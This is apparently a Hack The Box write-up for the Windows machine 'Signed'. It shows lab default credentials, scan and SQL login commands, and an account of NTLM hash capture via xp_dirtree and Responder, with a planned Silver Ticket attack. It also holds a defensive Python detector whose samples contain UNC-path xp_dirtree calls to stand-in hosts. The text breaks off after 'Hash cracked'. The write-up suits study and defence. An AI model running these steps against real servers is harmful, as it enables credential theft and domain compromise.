Signed

Platform: Hack The Box

Season: 9

Difficulty: Medium

OS: Windows

Date: 2025-11-11

Author: x4cc3


Executive Summary

Signed is a Medium Windows domain controller machine running Microsoft SQL Server 2022. Initial access uses default credentials scott:Sm230#C5NatH to connect via mssqlclient.py. An NTLM hash is captured via Responder and cracked to reveal mssqlsvc's credentials. Once authenticated as mssqlsvc, a Silver Ticket attack is executed using the cracked NTLM hash and domain SID to forge a Kerberos ticket granting sysadmin privileges, enabling direct file reads of both user and root flags.


Reconnaissance

Port Scan

nmap -Pn -sV -sC 10.10.11.90

Port      Service  Version
1433/tcp  MS-SQL   Microsoft SQL Server 2022 RTM

Initial access to the SQL server used default credentials:

mssqlclient.py scott:Sm230#C5NatH@10.10.11.90

Hash Capture via Responder

Using xp_dirtree to trigger an SMB connection back to the attacker's machine, an NTLMv2 hash was captured via Responder.
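
As an added example (not part of the original write-up), the following Python detection logic shows how a defender could flag this behaviour in captured SQL statement text, for instance from SQL Server Audit or Extended Events. The event tuples, host names, addresses and allow-list are constructed for illustration, and the function name is hypothetical.

```python
import re

# Extended procedures that make SQL Server open a filesystem path. Given a
# UNC path, the service account authenticates to the named host over SMB.
PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")

# Procedure name (optionally bracket-quoted, any schema prefix) followed by a
# string literal whose value begins with a UNC host.
PATTERN = re.compile(
    r"\[?\b(?P<proc>" + "|".join(PROCS) + r")\b\]?"
    r"[^;']*?N?'\\\\(?P<host>[^\\'/\s]+)",
    re.IGNORECASE,
)

# Constructed (login, statement) pairs standing in for audit records.
SAMPLE_EVENTS = [
    ("scott", r"EXEC master..xp_dirtree '\\192.0.2.10\share', 1, 1"),
    ("scott", r"exec [master].[dbo].[XP_FILEEXIST] N'\\198.51.100.7\x'"),
    ("backup_job", r"EXEC xp_dirtree '\\FS01\sqlbackups', 1, 1"),
    ("backup_job", r"EXEC xp_dirtree 'D:\backups', 1, 1"),
    ("app", "SELECT name FROM sys.databases -- xp_dirtree in a comment"),
]


def find_unc_calls(events, allowed_hosts=()):
    """Return (login, proc, host) for each UNC path sent to a non-allow-listed host."""
    allowed = {h.lower() for h in allowed_hosts}
    hits = []
    for login, statement in events:
        for m in PATTERN.finditer(statement):
            host = m.group("host").lower()
            if host not in allowed:  # local paths never match; known servers are skipped
                hits.append((login, m.group("proc").lower(), host))
    return hits


if __name__ == "__main__":
    # FS01 is an assumed internal file server that backup jobs legitimately use.
    for hit in find_unc_calls(SAMPLE_EVENTS, allowed_hosts={"FS01"}):
        print("ALERT login=%s proc=%s remote_host=%s" % hit)
```

Statements that build the path in a variable are not matched by this pattern, so blocking outbound SMB (TCP 445) from the database server remains the stronger control.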

Hash cracked
